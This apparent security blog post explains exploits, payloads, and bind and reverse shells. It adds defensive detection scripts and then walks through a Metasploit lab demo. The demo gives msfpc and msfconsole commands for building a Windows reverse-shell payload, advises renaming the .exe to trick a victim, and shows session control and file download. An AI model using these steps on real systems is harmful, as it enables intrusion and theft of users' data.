In layman's terms, an exploit is a security attack on a vulnerability. Exploits have the potential for large-scale damage, such as installing malware on a system, gaining system access, or recruiting client machines into an existing botnet.
This is accomplished with the help of a payload. The payload is a sequence of code that is executed when the vulnerability is triggered. To make things clear, an Exploit is really broken up into two parts, like so:
EXPLOIT = Vulnerability + Payload
The payload is usually written in assembly language and is platform- and OS-dependent. That is, a Win32 payload will not work on Linux (even if we are exploiting the same bug).
Different payload types exist and they accomplish different tasks such as:
- exec: Execute a command or program on the remote system
- download_exec: Download a file from a URL and execute
- upload_exec: Upload a local file and execute
- adduser: Add user to system accounts
Payloads come in many different flavors and can range from a few lines of code to small applications such as the Meterpreter shell. One should not just automatically jump to the Meterpreter shell. Metasploit contains over 200 different payloads.
However, the most common payload type used with exploits is shellcode, also known as a shell payload. These payloads are very useful because they provide the attacker with an interactive shell that can be used to completely control the system remotely.
There are two different types of shell payloads:
Bind Shells: A socket is created, a port is bound to it, and when a connection is established to it, it spawns a shell. The shell lies dormant while awaiting instructions from an attacker.
Reverse Shells: Instead of creating a listening socket, a connection is made out to a predefined IP and port, and a shell is then shoveled to the attacker.
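As an added example (not code from the original post), here is a small triage script that shows what the two shell shapes above look like from the defender's side of the connection table: a bind shell appears as a listener that was not in the host's baseline, and a reverse shell as an outbound session owned by a binary running from a user-writable folder. The two netstat-style snapshots, and every address, port, PID and path in them, are constructed sample data.

```python
from collections import namedtuple

# Constructed netstat-style snapshots (proto local remote state pid image);
# every address, port, PID and path below is made-up sample data.
BASELINE = """\
tcp 0.0.0.0:135 0.0.0.0:0 LISTEN 880 C:\\Windows\\System32\\svchost.exe
tcp 0.0.0.0:445 0.0.0.0:0 LISTEN 4 System
tcp 192.168.1.20:49712 192.168.1.5:443 ESTABLISHED 3120 C:\\Program Files\\Browser\\browser.exe
"""
CURRENT = """\
tcp 0.0.0.0:135 0.0.0.0:0 LISTEN 880 C:\\Windows\\System32\\svchost.exe
tcp 0.0.0.0:445 0.0.0.0:0 LISTEN 4 System
tcp 0.0.0.0:4444 0.0.0.0:0 LISTEN 5120 C:\\Users\\alice\\Downloads\\invoice.exe
tcp 192.168.1.20:49881 192.168.1.10:4444 ESTABLISHED 5188 C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe
tcp 192.168.1.20:49712 192.168.1.5:443 ESTABLISHED 3120 C:\\Program Files\\Browser\\browser.exe
"""

Conn = namedtuple("Conn", "proto local remote state pid image")

def parse(snapshot: str) -> list:
    """Split each line into six fields; maxsplit keeps spaces inside the image path."""
    conns = []
    for line in snapshot.splitlines():
        proto, local, remote, state, pid, image = line.split(maxsplit=5)
        conns.append(Conn(proto, local, remote, state, int(pid), image))
    return conns

def from_user_writable(image: str) -> bool:
    """Heuristic: binaries launched from profile or temp folders deserve a second look."""
    low = image.lower()
    return "\\users\\" in low or "\\temp\\" in low or "\\appdata\\" in low

def bind_shell_candidates(baseline: list, current: list) -> list:
    """Bind shell shape: a listener (local address + image) the baseline never had."""
    known = {(c.local, c.image) for c in baseline if c.state == "LISTEN"}
    return [c for c in current
            if c.state == "LISTEN" and (c.local, c.image) not in known]

def reverse_shell_candidates(current: list) -> list:
    """Reverse shell shape: an outbound session owned by a user-writable binary."""
    return [c for c in current
            if c.state == "ESTABLISHED" and from_user_writable(c.image)]

if __name__ == "__main__":
    base, now = parse(BASELINE), parse(CURRENT)
    for c in bind_shell_candidates(base, now):
        print(f"new listener {c.local} pid {c.pid} ({c.image})")
    for c in reverse_shell_candidates(now):
        print(f"outbound {c.local} -> {c.remote} pid {c.pid} ({c.image})")
```

On a real host the same comparison is done against a recorded baseline of listeners and against an allow-list of images expected to make outbound connections; the heuristics here are deliberately simple.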
The Meterpreter (short for meta-interpreter) shell, a special type of shell, is the bread and butter of Metasploit. The Meterpreter shell can be added as a payload that is either a bind shell or a reverse shell. The Meterpreter is one of the advanced payloads available with the MSF, but you should not look at it as just a payload; rather, view it as an exploit platform that is executed on the remote system. The Meterpreter has its own command shell, which provides the attacker with a wide variety of activities that can be executed on the exploited system.
Additionally, the Meterpreter allows developers to write their own extensions, in the form of DLL files, which can be uploaded and executed on the remote system. Thus, any programming language in which programs can be compiled into DLLs can be used to develop Meterpreter extensions.
However, the real beauty of the Meterpreter is that, once exploitation occurs, it runs by injecting itself into the vulnerable running process on the remote system. All commands run through Meterpreter also execute within the context of that running process. In this manner, it is able to avoid detection by anti-virus systems or basic forensic examinations.
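Because the in-process behaviour described above leaves no new executable on disk, defenders look for it in thread-creation telemetry instead. As an added example (not part of the original post), the script below scans constructed, simplified records that borrow the field names of Sysmon Event ID 8 (CreateRemoteThread) and flags a thread started in another process when the creator runs from a user-writable folder or the thread's start address is not backed by any module on disk (empty StartModule). The record format (one record per line, fields separated by "|") and all paths, PIDs and modules are constructed sample data.

```python
# Constructed records using Sysmon Event ID 8 (CreateRemoteThread) field names,
# one record per line, fields separated by "|". Every path, PID and module
# here is made-up sample data.
EVENTS = """\
EventID=8|SourceImage=C:\\Windows\\System32\\csrss.exe|SourceProcessId=612|TargetImage=C:\\Windows\\explorer.exe|TargetProcessId=2040|StartModule=C:\\Windows\\System32\\ntdll.dll
EventID=8|SourceImage=C:\\Users\\alice\\Downloads\\invoice.exe|SourceProcessId=5120|TargetImage=C:\\Windows\\System32\\notepad.exe|TargetProcessId=5300|StartModule=
EventID=8|SourceImage=C:\\Program Files\\Browser\\browser.exe|SourceProcessId=3120|TargetImage=C:\\Program Files\\Browser\\browser.exe|TargetProcessId=3120|StartModule=C:\\Program Files\\Browser\\browser.exe
"""

def parse_events(text: str) -> list:
    """Turn each key=value|key=value line into a dict (values may contain spaces)."""
    return [dict(field.split("=", 1) for field in line.split("|"))
            for line in text.splitlines()]

def from_user_writable(image: str) -> bool:
    """Heuristic: code started from profile or temp folders deserves a second look."""
    low = image.lower()
    return "\\users\\" in low or "\\temp\\" in low or "\\appdata\\" in low

def suspicious_remote_threads(events: list) -> list:
    """Flag a thread created in ANOTHER process when the creator runs from a
    user-writable folder or the thread start is not backed by a module on disk
    (empty StartModule), which is the shape injected code tends to have."""
    hits = []
    for e in events:
        if e.get("EventID") != "8":
            continue
        cross_process = e["SourceProcessId"] != e["TargetProcessId"]
        unbacked_start = e.get("StartModule", "") == ""
        if cross_process and (from_user_writable(e["SourceImage"]) or unbacked_start):
            hits.append(e)
    return hits

if __name__ == "__main__":
    for e in suspicious_remote_threads(parse_events(EVENTS)):
        print(f"{e['SourceImage']} (pid {e['SourceProcessId']}) -> "
              f"{e['TargetImage']} (pid {e['TargetProcessId']})")
```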
In this blog demo, we are going to try and generate a payload in order to get control of a client Windows machine. I will try to keep this as concise as possible. Let’s get started!
On your Kali virtual machine, go to Exploitation Tools—> MSFvenom Payload Creator
To create a payload, we simply need to state the target type and where to listen. In this case the target is a Windows machine and we will be listening on the Ethernet interface.
Type the following command in terminal: /usr/bin/msfpc windows eth0
Hit enter and a custom payload will be generated which contains the attacker IP and port number details. The payload need not keep its auto-generated name; it can be renamed to any convenient name that will fool the user into running the .exe file that has been created.
Next we need to start the listener by running the MSF handler file with the command: msfconsole -q -r '/root/filename.rc'
The listener will start up and wait for the Windows machine to execute the .exe file.
For demo purposes, I have already loaded the .exe file on the Windows machine and will now execute it by double-clicking it.
Note: The victim and host machines should be on the same LAN.
As soon as the .exe file is run, a session is initiated at the attacker machine. We interact with it by entering the session ID with the command: sessions -i 1
With this, the two computers can talk back and forth and the Windows machine can be controlled through this terminal.
In the image below, the pwd command displays the current directory of my Windows machine, and the dir command displays all the directories with their permissions.
Thus an attacker can search for sensitive information on a victim PC remotely.
For instance, in the above image one of the directories is named Passwords and may contain passwords saved in a plain text file. The files can be downloaded to your Kali machine with one simple command: download 'file1.txt'
Similarly, an attacker can edit or upload files on the client machine.
This concludes a basic Metasploit demo where we generated a payload and exploited a victim Windows machine. It is evident that Metasploit provides efficient and easy-to-use tools for exploitation. It is an industry favourite because it lets developers write their own extensions and is able to avoid detection by anti-virus systems.